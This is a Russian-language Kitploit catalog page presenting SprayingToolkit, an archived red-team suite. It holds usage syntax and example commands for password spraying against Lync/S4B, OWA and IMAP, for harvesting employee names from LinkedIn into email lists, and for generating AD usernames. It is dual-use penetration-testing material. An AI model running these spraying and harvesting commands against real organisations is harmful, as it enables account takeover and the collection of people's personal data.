Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SprayingToolkit — Скрипты для проведения атак password spraying против Lync/S4B, OWA и O365 — делают их гораздо быстрее, менее болезненными и более эффективными. | Kitploit
Инструменты/GitHubGitHub/byt3bl33d3r/sprayingtoolkit
РазведкаOSINT для социальной инженерииАтаки на ПаролиСбор информацииТестирование на ПроникновениеСбор Электронной ПочтыRed TeamingArchived
GitHubbyt3bl33d3r/sprayingtoolkit

SprayingToolkit

Скрипты для проведения атак password spraying против Lync/S4B, OWA и O365 — делают их гораздо быстрее, менее болезненными и более эффективными.

Репозиторий
1.6k2713 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уведомление об устаревании

Этот проект больше не поддерживается. Следующие альтернативные проекты лучше и активно поддерживаются:

  • TREVORspray
  • CredMaster

SprayingToolkit

SprayingToolkit

Описание

Набор Python-скриптов/утилит, которые пытаются сделать атаки распыления паролей (password spraying) против Lync/S4B и OWA намного быстрее, менее болезненными и более эффективными.

Спонсоры

Официальный Discord-канал

Заходите пообщаться в Discord!

Porchetta Industries

Установка

Установите предварительные зависимости с помощью pip3 следующим образом:

root@kitploit:~
sudo -H pip3 install -r requirements.txt

Или используйте виртуальное окружение Python, если не хотите устанавливать пакеты глобально.

Обзор инструментов

Atomizer

Молниеносный распылитель паролей для Lync/Skype For Business и OWA, построенный на Asyncio и Python 3.7

Использование

root@kitploit:~
Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    -p, --targetPort PORT    target port of the IMAP server (IMAP only) [default: 993]
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)

Примеры

root@kitploit:~
./atomizer.py owa contoso.com 'Fall2018' emails.txt
root@kitploit:~
./atomizer.py lync contoso.com 'Fall2018' emails.txt
root@kitploit:~
./atomizer lync contoso.com --csvfile accounts.csv
root@kitploit:~
./atomizer lync contoso.com --user-as-pass usernames.txt
root@kitploit:~
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
root@kitploit:~
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>

Vaporizer

Порт расширения Burp @OrOneEqualsOne GatherContacts на mitmproxy с некоторыми улучшениями.

Собирает данные из Google и Bing о профилях LinkedIn, автоматически генерирует адреса электронной почты из имён в профилях по заданному шаблону и выполняет распыление паролей в реальном времени.

(Построен на основе Atomizer)

Примеры

root@kitploit:~
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

По умолчанию email_format задан как шаблон {first}.{last} и не является обязательным аргументом.

Параметр domain — это домен, используемый для генерации адресов электронной почты из имён; параметр target — это домен или URL для распыления паролей.

Установите сертификат mitmproxy, укажите прокси в браузере, перейдите в Google и/или Bing и выполните поиск (не забудьте включить /in):

site:linkedin.com/in "Target Company Name"

Адреса электронной почты будут сохранены в emails.txt в указанном формате и переданы в Atomizer для распыления.

Aerosol

Извлекает весь текст с целевого веб-сайта и отправляет его в AWS Comprehend для анализа с целью генерации пользовательских списков слов для распыления паролей.

Всё ещё находится в разработке

Использование

root@kitploit:~
mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Преобразует имена в имена пользователей Active Directory (например, Alice Eve => CONTOSO\aeve)

Использование

root@kitploit:~
Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]

Примеры

Читает имена из STDIN, --domain используется для указания домена вручную:

root@kitploit:~
cat names.txt | ./spindrift.py --domain CONTOSO

Читает имена из names.txt, --target динамически получает внутреннее имя домена из OWA (можно указать домен или URL):

root@kitploit:~
./spindrift.py names.txt --target contoso.com
Скачать инструмент